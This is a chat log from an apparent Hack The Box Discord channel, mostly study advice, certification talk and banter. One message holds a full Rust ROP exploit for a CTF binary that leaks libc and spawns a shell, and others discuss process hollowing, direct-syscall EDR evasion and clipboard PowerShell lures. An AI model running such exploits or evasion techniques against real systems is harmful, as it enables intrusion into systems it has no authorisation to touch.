#general
1 messages Β· Page 405 of 1
elo in chess
Why is writing notes such a boring process
2.3k on chess.com
really?
i have autism
you have to make it fun
show profile
i promise you i do not have my chess.com profile from when i was 16
π
ngl Rust is goated, functions have unique types unless you explicitly set their types using pointer functions
I will proceed to disbelief
read all the content then write your notes from pure memory, then go over the material for whatever you dont remember
I have to make notes on like 7-8 modules
that's okay
That ive finished
idk why this is useful but its nice
π
its just chopped syntax
@exotic pendant hello
sup sup
Got back late but the kid and I did a 1 shot DnD game last night

I have a question
Why is stuff written in Rust fast? Like whats the main reason?
that being said, my payloads should not be in C given there are literally projects dedicated to finding vulnerabilities in malware code to stop them (eg ransomware)
at least it aint:
public static void main(String [args]){
}
C but memory safe
Thats great
no one said i liked java or C#
I just remembered, i have to start learning Java for college
You should like Rust
i am literally a bash C and go enthusiast
Is there any htb staff available that can help me with an icky issue
i dont like the syntax
i like what it does i dont like writing it
@stable tiger how did you learn Java?
minecraft modding when i was 12
Cos all the work done by most languages at runtime is done by the compiler, therefore the compiler is slow but the binary is fast

Bruh
How should i learn java?
Whats your opinion?
Frost new CVE https://nvd.nist.gov/vuln/detail/CVE-2025-64524
Is it just me or did you recently get a new cert?
why do you need to learn java
thats not me saying dont
Congratulations Frost
tahts me asking how youd learn it
College
Alright stop flexing on us peasants
i got the new cert
how long did that PoC take to write lmao
π
Ima preparing for CAPE, fr
To find the bug? like 30 mins
Damn i wanna give that too, good luck G
i meant the exploit
ive never touched cups
I have CJCA token and CPTS token
The CPTS token can be exchanged for any other exam too
I didn't exploit, i just found the bug and reported
Either can use the time to find more bugs or make exploit
oh shit fair enough
@meager kernel learn from a practical project
in java
find a usecase
Frost chose more bugs
gui for example
just write a gui frontend for a tool you frequently use
i mean isnt that really all low level languages
like drawing in C++ is cancer
Ye but Rust is the best
frost how many of your projects are in rust
Yes
understandable
I rewrote pwntools in Rust
im going to look at your githu now
use pwnt::*;
use std::io;
#[tokio::main]
async fn main() -> io::Result<()> {
let binary_path = "./rocket";
let libc_path = "./glibc/libc.so.6";
let elf = Elf::new(binary_path).expect("Failed to load binary ELF");
let libc = Elf::new(libc_path).expect("Failed to load libc ELF");
let mut target = Target::process(binary_path).expect("Failed to spawn binary process");
let padding = vec![b'A'; 40];
let ret = elf.search("ret").unwrap();
let pop_rdi = elf.search("pop rdi; ret").unwrap();
let main_addr = elf.symbols.get("main").unwrap();
let puts_plt = elf.plt.get("_end").unwrap();
let puts_got = elf.got.get("puts").unwrap();
println!("pop_rdi: 0x{:x}", u64(&pop_rdi).unwrap());
println!("ret: 0x{:x}", u64(&ret).unwrap());
println!("puts_plt: 0x{:x}", u64(puts_plt).unwrap());
println!("puts_got: 0x{:x}", u64(&puts_got).unwrap());
println!("main_addr: 0x{:x}", &main_addr);
let payload = combine(padding + &ret + &pop_rdi + &puts_got + &puts_plt + &main_addr);
target.sendlineafter(b">>",&payload).await?;
target.recvuntil(b"Preparing beta testing..\n").await?;
let leak_addr_bytes = target.recv(6).await?;
let leak_addr = u64(&leak_addr_bytes)?;
println!("Leaked address: 0x{:x}", leak_addr);
let libc_puts = 0x80e50; //libc.symbols.get("puts").unwrap();
let libc_base = leak_addr - libc_puts;
println!("libc base: 0x{:x}", libc_base);
let system_addr = libc_base + 0x050d70; //libc.symbols.get("system").unwrap();
let bin_sh_addr = libc_base + 0x1d8678; //libc.search("/bin/sh").expect("Failed to find /bin/sh in libc");
let second_payload = flat(vec![
&padding,
&ret,
&pop_rdi,
&p64(bin_sh_addr),
&p64(system_addr),
]);
target.sendlineafter(b">>", &second_payload).await?;
target.interactive().await?;
Ok(())
}
bruh
That's actually very cool
thank you for your service btw (even tho im not from the us)
so why is the repo empty
i didnt release ityet
do you work for the CIA or something?
make a windows equivalent
and ill move to rust permanently
shh
bro developing pwns in Rust? damn
UHHH
a pwntools rewrite is fucking crazy lengthy
YOU FUCKED UP
@unborn fable no, that's illegal
I mean it does, it works in all OS that uses Rust
ethical use
same with regular pwntools in python
please
the moment you involved that site it became unethical, there's no ethical way around it
i meant for the libc functions having a crt equivalent
i need help please
iβm being threatened
oh yeah iwas working on that also
lol what did he post
bro thinks he could fool us the AI agents xD
CONTACT THE POLICE, you've been told before
that would be very neat
ya done mate
nice
very nice
it crashed!
Forgot about it
Found a bug in code last night, decided to fuzz while I was at DnD
ping me if you ever get those crt functions working on ur rewrite, i'll move to rust for all projects when that's done
I'll have to get the motivation to continune the project. I might be burnt out a little
cos that's legitimately useful to speedrun exploit code built into payloads for eg
fair, that's a huge workload
I got all the offsec certs in 2-3 months and then got lazy
how was the osee
ok all offsec certs that ent provides
their website glazes it but from everyone i know sec760 is harder
OSEE is seperate saddly
nah. CIA deployed you to some country I bet
ah alr
OSED was ezpz
figures isnt it only stack?
mostly and 99% of it is just bypassing stuff like SEH
ah so just nop slesd and rop chains
Skill issue
i might just get the cert for the resume ngl
do it
do they force ida or can i use binja in the exam?
syllabus literally says pro π no way
lol they wouldnt give you pro
but i think they do that to prevent you using plugins
Yeah that makes sense tbh
I'd rather do the sans courses but fuck man theyre expensive
I want to get SANS done eventually
Frojbite
i hope stephen drops that 860 course he just mentioned
Yea would be nice

hyper-v kernel and secure kernel broker 0day would be a crazy class
My hyper-v escape was approved
just need them to fix and pay
same with my RDP escape
just vm-> host user
ah that's a shame
i swear you can pop open 50% of windows drivers and just find a bug staring at you
i found 2 UAFs by just spam looking for calls to free memory lol
profitable engagement?
haven't gotten around to writing a PoC cos it's a ridiculous attack chain
i was bin diffing the patch to the cloud filter driver they did a month ago and saw it
Watch Microsoft "I'll give $10 for the bug"
but they did just fix an lsass rce, so that might be worth looking at the bitch for
probably lmao
looks like you're getting a new car
what'd you get
Kia k4
nodejs looking ahh car
No idea because I've never seen one before
Cups bug is just another off by one
all 5 crashes
checks out

frost how old are you
30
fuark
old man
not even

I was just a Sr Sysadmin in the Navy
but got a good foundation of AD and other services from it
Guys I AM EVIL. The bad act I`ve done: said mean stuff on the internet.
18 year old frost straight to the persian gulf as a Sr Sysadmin. Had to learn fast

thats what im finna do
Military?
im considering airforce cybersec here but theres also our NSA equivalent
What country
australia
Nice
you leave it running overnight?
we have a degree requirement here tho so it's a bit of a pain
Yeah I ran before I went to do the 1shot dnd game and forgot about it
lol
i mean it's a good idea
do whatever you want while you find bugs
I just patched it and rerunning

so i can find further bugs
I am going to force myself to play fallout today

I've started fallout 4
they're remaking 3????
forcing yourself to play fallout is honestly crazy π
we're clearly fans
wdym forcing
life is great
When you get old like me, your attention span is low
playing games isnt as easy
- just turned 30
electricity bill 
yet you still managed to grab most certifications xD
payed for by bug reports
I only pay 900 a month, so cheap
kidding
no, its just way more boring than irl stuff right
my electric bill is cheap like $80
why would i focus on that bs its too slow
frost why did you get so many certs π
Yeah
For fun
bars
Helllooo
Is there a way to check account creation date on HTB? In any way shape or form cause my mails arent synchronized to my new phone
o/
we should play minecraft someday
i'll teach you about minecraft, you teach me advanced exploitation
sounds like a good deal
Found this today: https://github.com/secorizon/OffByWon
lol i saw that on linkedin this morning
offbywon
you run your fuzzers on cloud or something?
yeah same lol
looks interesting
nah my pc
on the host, not even in a vm
well
adocker container
nice
just look at OSED and OSEE syallbus and then learn those topics
then practice
speaking of vms I tried to find a vm escape in virtualbox today, no luck 
thats the easiest beginner way to do ts
i'm just playin around
I did find very interesting things tho
I need Microsoft to finish what I reported and then maybe I'll hit hyper-v more
Wouldnt be vulns but would be cool in a red team playbook
just look in vmware
look for VBS bypasses
my vmware bug was approved but they just added me to the hof
no they patched it well lol
defensive measures were interesting to see
they do a lot of checks
I think I had found a bug in one of vmware's drivers once but forgot to look into it more
why does offsecs exploit dev essentials course cover arm assembly not x86 π
@exotic pendant that RCE gadget I found, do you think they'll accept it if the XSS isn't there? because I couldn't find anything
confirmed the gadget works though
π
if you cant execute it, then it'll be denied
I execed from devtools console LOL and it worked, but idk if that'll be considered for the purpose of demo or not
nah they wont take it lol
yeah π
did find something interesting recently tho
old CVE which was supposed to be patched on my version of windows still works
and I have the hotfix for it installed already
yeah I did bypass.. didnt work on win11 but that was expected
holy massochism
some pizza, a drink, shawties
Thsts crazy
Nah just pizza Nd family, idc bout throwing a party tbf
Wait, are you down south from NSW?
Can I ask someone about machine submission?
I see you
help
i can help
i can not enter password https://academy.hackthebox.com/module/18/section/70 question 1


yo finally i am back after 1 Year π
Welcome back
have a nice day
i just started learning cyber sec, bought the student subscription on someone's advice and enrolled in the junior cybersec analyst jon path but it has alot of theory which makes me feel like im not doing anything and ill forget all this anyway lateron.. what to do? should i comeplete it or skip it and go directly to pentester path?
make notes
do the Junior Cybersecurity Analyst Path it is perfect for getting your fundamentals in blue team and red team
Make notes and watch videos
if you forget it, in the future you can quickly read up on it
so u do recommend me to finish it ehh]
well if you wanna do the more advanced paths efficiently, finishing this path is a must
but this will take forever before i even begin to do the actual stuff.. is it meant to be this way?
yes, you need to have a mastery of the basics
ahhh the problem is that my parents wont see me doing anything lol
yes
cybersec takes time
What kind of parents is this?
but if you grind straight up for 1-2 years, you will see the difference
tell your parents that mastering the fundamentals is a necessary step in being able to perform tasks
Take a hammer and smash your keyboard, then you do something
ahh.. is it realistic to expect completition of pentester path along w cpts by the end of this year? i wanna see how u people imagine it
@novel oriole yes cybersec takes alot of time
its natural
it took me 1 year just to get past the fundamentals and start doing HTB machines
but its alright
all great things take time
Super realistic if you are young brother, you have no obligations except your own studies
you can grind all day every day
are u employable now?
well i think this is possible
see this msg βοΈ , was my last 2025 msg . and there was one more msg i deleted i am 17 so i can't buy htb so they ban me for 1 year i be 18 . but now i am 21 , good job moderators.
rn i have 2.5 months holidays
You can grind and smash the fundamentals in those 2.5 months
and you will be on your merry way already
bruhh please suggest me howww just blindly following this htb junior path?
All you need is to believe
got employed recently
bruhhh congrats
biggest flex in today's market π
Do the junior path, get some books that you can read too. Start installing some virtual machines and play around, theres books about this like "Linux basics for hackers"
I believe in you ibraheem
well i have already setup kali linux in VMware workstation pro.. i bought htb subscription well prepared
π₯Ή π
rupees
guys how do you think playing HTB and CTFs has benefitted you?
I dont believe in you, I actually think of something higher about u
Kratos gets paid in "hopes and dreams"
huh??
trust urself
Hacking labs has benefited me in such way that i now have less hair on my scalp and also my hardware is fried from too much john the ripper and hashcat
well, lets see.. ill grind properly from now
you are just increasing your power level just like Saitama
Uncle Saitama
btw guys
CPTS VS OSCP any idea?
i heard that cpts makes u more skillful and oscp is just more recognized
If we have any of the veterans logged in they can answer that for you
i see..
CPTS is if you wanna prove your skills, OSCP is if your company is willing to pay for u or you are some kind of rich guy
well cpts then
Im just here for the shits and giggles, trying to avoid to do as many certs as possible 
I saw a lot of companies willing to pay for OSCP if you perform security tasks or pentesting
but rn my distance from cpts is like distance from earth to neptune
Thats a defeatist mentality. Set up smaller goals and reach them on a daily basis
well now i have accepted that it will take time but will happen eventually.. focuz AND faith
You also need to enjoy your jouney
if you dont enjoy the journey, the end goal is not going to save you
Vro...
well back in my OS classes in uni i enjoyed commandline work especiialy in linux thats all i can say for now
I went to buy milk I never bought it
echoes....
always set smaller goals towards the bigger ones
I am trying to get a job
As a dev?
What kind?
Junior QA Tester & Implementation
So, important note. You read for as long as you can focus before its beoring. thats usaully around the 90 minute mark. Then you STOP reading for the day and start experimenting in the VMs
Im trying to remember SQL and check thru microsoft excel
When im reading about something, after 90 minutes its just a fog and its pointless to read anymore
so even at this stage i should focus on vms ? i did predict this and collected my old OS labs which im gonna redo to recall my linux stuff
Depends on what
Boring academic subjects, I can focus for up to 90 minutes before losing interest
Cybersecurity stuff I sometimes do for 16 hours at a stretch 
Yeah man why not? get hands on practise, get our brain to think about what you read in actual practise

Thas because this is a passion for you
Passion never gets boring
Yeah... whereas zero passion in the academic stuff I'm doing right now so I see the contrast
anyway... thank you all.. you really boosted my morale π
earth is round, so it depends
sometimes gotta push through the boring parts to get to the fun ones
and how can i start learning?
Check out #welcome
one last question.. i have a strong grip on JAVA.. so in cyber sec which one should i shift to? python or rust?
Python
What does blue team do
Hehe
Defends against red team
ok so imma learn python ig
Ibraheem brother, download a VM called "Metasploitable" thers 2 or 3 versions of it that you can use to practise different stuff on. Those VMs are so vulnerable that literally anything works on them, but dont connect those to the internet tho
But what is better to learn
Easy learning curve if you already know Java
both
Is there a channel where I can ask for job help?
Sorry if this is a dumb question.
Depends on what you're interested in.
I recommend the CJCA pathway + cert in HTB, it starts off with both red team and blue team concepts.
what would happen if they are connected to internet?
Some chinese will hack into your network
ya im mega comfortable w java and C
Anyone can access the VM and it would lead to your VM being compromised
lmaooo, ty imma search it up
then Python will be easy
you say you're comfortable with C? π
Blue team folks are responsible for defending networks
Isnt that the case with most vm
It is what I do
C1oud the resident blueteamer
Na, teams and excel
Yes, but Metasploitable has security vulnerabilities in it on purpose, so it would be worse
yes not too advanced but im comfortable did some projects along w file handling stuff as well
both bcuz knowing your adversary's plan is good
in java i have made many many projects
I, the red teamer, will undefend your networks 
Maybe i could try to hack it
But im not very competent yet
We shall spar to the death
Try and see
how can i join your team?
Would be a good learning experience
Metasploitable is great fun, just setup a nat network between your attacker and metasploitable
My HTB team? I don't think we're taking in apps at the moment, but you could always try to join in the future
or if you're interested in other teams there is the #1318239802931286066 channel
did u all also feel like im feeling nduring ur entry into the cyber sec world?
If you're talking about red team/blue team stuff then you can start learning on HTB
nah, the red team
^
its hard
bcuz it doesnt teach you the concepts
Cant i just put it on my network
no
what doesn't?
you have to search the answer of each question and suvmit it, so what's the point of learning if you have to copy paste answers?
Love of my life πΆ
Why would you search the answer? You have to derive it through the task you're given
That's how you learn
If your metasploitable VMs gets compromised, you dont want it on the same network as anything outside of virtual machines

Big no
i am talking about the "machines" there you have to answer questions that you werent taught
Correct
ok
You learn from Academy, you apply those concepts in Labs
academy?
You dont copy paste from a walkthrough, if that's what you're imagining
Also in real cases you know nothing about target
Just like in life there are questions that don't have immediate answers
the first thing i saw was the machines
when i created my acc
Yeh it's a bit confusing admittedly
@molten bobcat did you do the holmes CTF? I think it was there sometime in october last year
I haven't done anything in a while
Acadam.... π΄ noo im joking guys dont kill me 
Focused on work
can i learn these things anywhere else?
Ye
yes
where?
but the best option is here
and idk what to learn
There are people who want to do blue team?
We have no clue dude lmao it's the internet
-# totally havent been hired to say this
It's huge
and where to start
Well yes
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I mean hi I work blue team now
Also most of os have only the red team tools
You can learn the same things from being an intern learning from older guys, you can learn it from books, you can learn it from other platforms, you can learn it from academy, you can also just grind for years on your own and fail over and over until your learn the correct way. Theres many roads to the same goal
I mean you can learn blue teaming if you want to and you can excel at it
Just that in general, its hard
Most blue team tools are things that make data manipulation easier
Or at least thats how I find it
I'm a SOC analyst for a living my most used program is Excel lol
How would you detect more sophisticated red team attacks?
(I know nothing about blue team ops)
Like a process hollowing attack
can i learn networking from here
https://www.softwaretestinghelp.com/computer-networking-basics/
got this from parrot os
I could theorize ways like a five second integrity health check on every running process
but idk how you would usually do it
Identify process lineage
??
I mean, creating address space inside a privileged process and running shellcode in it
I know
Why? You have a much better resource at HTB academy
(imo)
Also at what stage its possible to detect hacker
But the parent and child processes of a process that's been hollowed out will differ from the norm
can you check the website?
That's too vague of a question
Interesting
But you work for blue teams
Well think about it, if you hollow a process what are you trying to do?
guys i have a question that doesnt let me sleep
Yes, but I stop hackers in a very large amount of ways so it depends on what's going on
Just ask
suppose i learn everything that a beginner should learn from here
https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
what is the next step?
do i learn how to use the tools?
wont that be so hard
That website you sent? Not even 1% honestly, it looks like some random IT encyclopedia
Most things in life worth doing aren't easy buddy
I bought new coffee beans
WHO DOESNT WANT TO READ HERE I WILL SEND THEM THE 10 PLAGUES OF EGYPT
What is most used way the hackers try to mess
@austere sinew
Honestly my question can be broadened to:
I'm trying to execute code from memory without anything ever touching the disk
??
what was in firefox when i installed parrot so
do HTB academy and Labs side by side
I'm telling you, just start lol
why?
There is no way for all
Because that's not how this field works haha
I'd love to tell you immediately what works best for you but you have to discover it for yourself
Using brain
i dont have brain
Start doing that intro to security module in academy, or whatever its called
i have rotted brain
And so forth
is it free?
tier 0 modules are free
Check the site
that means basics so in general, yes
But what I mean about process hollowing is that it's intent is to hijack a binary and execute what you want using it as a disguise yes?
You literally see whatβs free and whatβs paid
so how am i going to find out answers to my questions?
Yes, that
What kind of questions?
Yeah you'll make the binary start behaving strangely and executing things it doesn't normally do
Doing the content?
this question
I can see that
Would you, if I added one tiny instruction among legitimate noise? π
i have more question btw
Then just ask
Homie how are we supposed to make a lesson plan for you from zero to "this guy has a job now"
Then do labs, CTFs etc
Lol
Yes
Yes
SIEM exists
Regardless of what you do to this process, you have to make noise on the process history
I learned thst in btl1
No I'm killing him too
Ok nvm
I'll just start with the process



Hitman
Look man someone trying to establish persistence at a high school in Texas needs to be hit with a brick full speed
What if I execute shellcode inside svchost.exe and THEN perform the APC
It will be seen
and it resumes with normal thread context
Good
Leaves a message for the others
I will turn you into a red stain on the highway if you fuck with my clients lmao

I'm just trying to think of ways the blue team can see your shit
This is usually handled by detection engineering. Bit too high in the ladder for me to handle myself
I'm completely leaving out detection technologies
Just talking about ways I myself could see it
@molten bobcat assuming no EDR, how would you defend against hell's gate or something?
ah
nvm then
I don't know what hells gate is aside from a sephiroth ability lmao
lol
Uhh I'd hold my arms out and stop it
extracting call numbers at runtime to perform syscalls to kernel directly
is hell's gate
Never heard or seen it
I'd say we cover about 90% of security shit
I say this
With the caveat
That a lot of things that happen to clients are their own fuckin fault lmao
Kernel syscalls is highly effective to bypass security essentially. Although EDR would catch them
Which is the best solution which I can think of
"this IP is not on our network"
Investing in a good EDR
probably just karen from HR
Nah this is
Analysts who work there
Telling me this
Just as clueless as anyone
Or is the DC public? π«
I'm so fuckin tired of dcs being public bro
Why
Why would you do this
CUZ IT HAS A WEBSERVER
WHY
SAME QUESTION BRO
They're public? π
WHY WOULD YOU DO THIS
Who the fuck runs a webserver on a DC?
why hacknet doesn't work?
You get trained to stop hackers and then it's the clients who are letting them the fuck in

Would these guys maybe run some "troubleshooting code" I guide them towards?
if so I'm gonna have a fun time if I'm contracted by your company π€£
oh is that the win+r, ctrl+v thing?
Yes
new stuff I havent really looked into
Copy paste this malicious powershell into your terminal to verify you're a human 
It has an extremely high success rate

I just started the box
... ok that speaks volumes about the victims 
Correct most people are morons help 
I recently found a domain used by some Chinese APT... and it was still active
I could use all the functionality lol
And you could blatantly tell it was attacker infra
I try not to touch attacker infra if I can
Not really. For most people, computers are magic dark boxes. Copy and post a line into this odd box doesn't sound that different from picking the image that is different or lining up the odd shapes, etc.
They startle like pigeons
It was fun to interact and see how they designed it.
They pulled the frontend from Facebook and it still had Meta's footers in it LOL
Of course it does lmao
Fair enough
They just copy paste it
@ornate ibex
It also popped up an SSO login to perform some action like adding a calendar for a meeting, and it looked very very very similar to Google's login popup
nearly identical
except the forgot password and create new account buttons didnt work lmfao
but otherwise looks the same at first glance
you enter your creds in the near identical google login, attacker connects and sends you an MFA prompt
I can ping it but when i try to recon, it's looking like the machine is off
THEN TURN IT ON
I entered cutetryguys:butgitgudnexttime in the prompt and sent it

you can do it
nmap 10.129.232.4
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 09:46 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.11 seconds

ping 10.129.2.251
PING 10.129.2.251 (10.129.2.251) 56(84) bytes of data.
64 bytes from 10.129.2.251: icmp_seq=1 ttl=63 time=45.0 ms
64 bytes from 10.129.2.251: icmp_seq=2 ttl=63 time=46.8 ms
64 bytes from 10.129.2.251: icmp_seq=3 ttl=63 time=46.2 ms
I usually enter gofuckyourself@domain.com
You could try the flag listed right in the error since you know the machine is up.
my bad
Yeh not talking to you lentho
I was talking about what I put in cred stealer links to test them
I often like to tell attackers to go to hell
Ironically the attacker is supposed to connect with you to send you the MFA prompt so the password you entered is still "processing"
Mhm
attacker didn't send me an MFA prompt though :(
I had a phishing page that had web elements that mimicked a Microsoft edge popup window for creds
they saw my password, I bet 
Ngl, if I was relying purely on UI and comparison to regular functionality, I'd be fooled
I say this because I'd spot "off" elements in google but microsoft keeps updating their pages all the time
microslop
I stared at it, and tried to click and drag the Microsoft edge window, WHICH WORKED
But it doesn't drag outside of the browser window
uh.. so? its just a popup
Because it's part of the website
you can drag popups
It's not a popup
oh π
You're not understanding me
my bad
The site animated and programmed
A false window
That behaved like a normal window
Except it was part of the website
No popup
It mimicked a Microsoft edge browser window
No they did nothing lmao
They highlighted on hover but no click functionality
they shouldve tbh
It's designed to be a cred stealer so it doesn't go away easy
reminds me of https://youareanidiot.cc
to this day I don't know what this above thing did 
or whatever that link is supposed to be
I forgot
Does it bounce around and sing
I didn't ask chat gpt (because I hate AI and find more value in advice from lived experiences) but does anyone know if there's a way to have multiple ideally simultaneous connections to different GitHub accounts on terminal so you can make commits to diff repos associated with those separate accounts?
No that was dancing hamster
Sorry 2009-2012 era
YouAreAnIdiot | Malware Database Wikia | Fandom https://share.google/bSDPVGwOdiIqpKDp2
Oh. Lol
yeah, multiple popups open every second lol
Yep
I killed it with task manager
Ok I knew that one under a much different name
It's using JavaScript to make the windows dance around
when does season 10 start
And different method of trolling
One that was likely to get you grounded if you were a kid
Free cupholder executable that would open the CD tray
It is?
6-7 days
I mean obviously it is but
Yeh
If you read the link I said
I should do once a personal project of my own coffee maker
It does mention it's a js trojan
awesome, appreciate the info. im getting decently far in my classes and im excited to keep the progress going
This
Yeah don't do that unless you're I dunno... Not planning on securing a bounty for your efforts
I'll try that out nxet time π€£
Oh not in bug bounties lmao
That was a joke. I just wanted to say six seven.
oh lol im old and unless your saying "IM RICK JAMES" or something i wont get it
Yeah that's my preferred meme as well. I'm just trying to kill the 67 meme. Doing my part as a millennial. Friend request incoming btw
You can set a git identity per repository.
gotchu big dog
I've only ever seen a YouTube video of it lol
So it's kinda the same thing I'm talking about just from the "other direction"? You're commiter you want to stay anonymous or under an assumed name is set and you just keep one config set on git in term?
Not specifically. IP address would still be consistent between all of them for example but you can set different accounts that way.
Pretty great
Hi guys, Im beginner and was wonderying if you would recomend the tryhackme premium ? Im asking here because I guess perhaps some of you tried it and can give objective opinion. Thanks.
HTB is better than THM
I am someone who did THM for 1 year and then moved to HTB
also THM was involved in many controversies regarding stealing user data and all
so i would recommend to stay away from them
hi
Oh that's no problem. Appreciate the ace advice. Basically just do all my notes and rough drafts for box write ups on a GitHub account with a username that matches my discord name. This is the manner I spend most my time so it just makes sense. Now i need to write some code for my portfolio tho and I don't want a potential employer seeing some weird name that may not make sense to them and a daft punk pfp ya feel me?
Holy cow?
Let me guess nothing happened?
Yep. And setting an identity per repository should work just fine for that.
Ah too easy then.
most beautiful women are those true to themselves
most beautiful men are those true to themselves
sheesh bro is Megamind
well people usually build their lives based on lies they told themselves
True. But inherently at odds with where we find ourselves as a global human community with social media hence the "why are there no more counter cultures" and "why is everyone all into the same stuff" YouTube videos
excellent assesment
Woooooow im also there
Use the XSS confetti POC for your next BB XSS submission
yoo how did u get there
I hacked the secret machine
why aint I there
/j
stimming rn
obsidian htb theme
lol HTB discord memebers
Hey that's me!
Oh yeah ofc
Yes?
everyone fell for it
π
Frosto dieting going better than expected
can already see striations in muscles
Study deez
nah the CEO of THM doubled down
is arc raiders any good
battlefield 6 is better
oh shit yeah battlefield 6 my bad
i cant get over this it's so funny
i like battlebit remastered because it can feel like an actual battle where you have to work with your team in a more realistic sense. when i played battlefield 4 everyone was always on their own or with a designated squad
although this was over 10 years ago

had to get my morning stim in
thank you for this advice
My good friend from the US once told me " America is about crushing a pill on a CD case and snorting it TO FEEL GOOD."

i can confirm
β This user is banned from Discord, you can't see their message. Learn More
Write-up of this new-retired web challange in HTB
Web Cache Deception Exploitation | CDNio HTB
https://www.youtube.com/watch?v=3lb1SHWe8WU
This is a technical video regarding Web Pentest for educational purposes, where I perform a code review of the machine https://app.hackthebox.com/challenges/CDNio?tab=play_challenge
β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬β¬
Interesting links related to the topic:
- My Web Cache Deception exploitation tool:
https:/...

Same actually
Except in half an hour I begin studying
So I vibe for a little bit
I unfortunately have to do it alone or I won't be as efficient as I'd like
that's alr
I kinda have to sequester myself away to get shit done
same
ive got diet coke and an oven pizza
im honestly so bored dude
i dont understand why i dont just do academy or read
i used to love reading
I've found that feeling bored goes away now that I'm on ADHD meds
I'm pretty good at finding something to do now
when did you start them? recently?
Few months ago

same its just more often than not i find myself shitposting instead of making actual dialogue
genuine issue
when i first started adhd meds i was a bullet
it's been a few years now though
I try not to focus on what it can do for my productivity
Because I don't give a fuck about that
I care about whether or not I can keep my emotions in check or wake up without anxiety
that's valid
time to put myself in my place, retreat into my cave with a single ethernet cable inside of it i dug out of the ground, connected to an super thin office desktop full of dust, and do htb academy
π«‘
i'm going in
pray for me
head /usr/share/seclists/Miscellaneous/List-Of-Swear-Words/en.txt -n281 | tail -n1




if you use wordlists you still have [REDACTED] in your computer
You can also land jobs through discord, so itβs worth making those connections

Congrats on CWES!
Very proud of you
Ayo buddy?
pet the buddy
tysmmmm
I will give him extra pets the next time I see him
Hello folx!
Good frogs
frog gif was for froj
Pretty good
welcome to htb
I understand I was just surprised with people in the chat that no one replied
Thanks, I actually got pretty far with the old website layout but everything looks much more polished now

. Can confirm
Imagine being briish
What's a Briish. That like a food /s
Ye kinda itβs a weird form of ration actually
Yo
Studying for?
so current subject is understanding windows attacks
at the moment its ASREProasting
Nice 
the CDSA is pretty nice content wise
they make you commit the attack
and then review the logs that attack typically generates
Ye itβs basically a practice lab right
Learning Kerberos and smb will be super useful though
got a question you might be able to answer about hashcat
For hashcat to be able to recognize the hash, we need to edit it by adding 23$ after $krb5asrep$:
Why do we do this? it doesn't explain why
Because thatβs the format on the hashcat wiki
is this just from how rubeus outputs it or..?
Yes
finally getting started in htb?
Yes. on my way to CWES
completed 35.48% in the path
should complete two or three modules tomw
Honestly if I could skip the βpathsβ Iβd do Htb exams
dont u get stuck on assesments?

